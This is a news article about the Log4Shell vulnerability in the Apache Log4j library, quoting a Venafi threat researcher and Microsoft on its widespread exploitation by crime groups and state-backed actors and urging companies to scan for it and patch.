With the Apache Log4j vulnerability seeing widespread exploitation, Venafi’s Yana Blachman says the situation could deteriorate rapidly to more destructive attacks from more sophisticated groups backed by nation-state actors and ransomware gangs. “Patching should be the concern of everyone asap,” says Blachman.
What is the Log4j vulnerability and why all of the dire warnings?
As major threat actors rachet up attacks, Yana Blachman, Threat Intelligence researcher at Venafi, explains why the Log4j vulnerability is so serious.
CISA has characterized the vulnerability as “one of the most serious…if not the most serious.” In response, CISA and its partners are tracking and responding to active, widespread exploitation of the vulnerability and CISA now has an Apache Log4j Vulnerability Guidance webpage.
“Log4Shell is a 0-day RCE vulnerability (CVE-2021-44228) in Log4j, a popular Java library for logging in Java applications, that allows a remote attacker to execute arbitrary code by sending a crafted log,” Yana Blachman, Threat Intelligence researcher at Venafi, said.
“The combination of this library being practically everywhere and the vulnerability being trivial to exploit with many exploits and PoCs [proof of concept] available online—makes it extremely dangerous and highly effective for every type of cybercriminal activity,” according to Blachman.
Blachman goes on to say that the widespread exploitation of the vulnerability means every corporate network is at risk.
“Since it was disclosed on Thursday, and some report even earlier than that, the vulnerability is [being] massively exploited in the wild by cryptomining and DDoS crime groups, such as Mirai, Muhstik, and Kinsing,” Blachman said.
“This can change very fast to more destructive attacks from more sophisticated and dangerous groups and leveraged by nation-state actors and ransomware gangs, [putting] every corporate network at risk. This is very alarming and patching should be the concern of everyone asap,” according to Blachman.
What criminal groups are involved and what action to take
The Microsoft Threat Intelligence Center (MSTIC) has observed the vulnerability being used by nation-state activity groups originating from China, Iran, North Korea, and Turkey.
“This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives,” according to Microsoft.
These access brokers then sell access to these networks to ransomware-as-a-service affiliates.
“This type of service might be extended and sold to other groups and ‘customers’ such as nation state actors leveraged for cyberespionage and IP theft purposes, similarly to other cases we’ve seen in the past,” Blachman said.
Blachman continued. “This type of initial access can be then leveraged by whoever it is sold to for credential access, using dedicated malware modules for stealing credentials and machine identities from infected Unix and Windows machines to then perform lateral movement within the targeted network for further exploitation, downloading malware or ransomware.”
We recommend companies to use the Log4Shell scanner [log4shell.huntress.com] to assess if they are vulnerable and patch it asap before becoming a victim, Blachman said.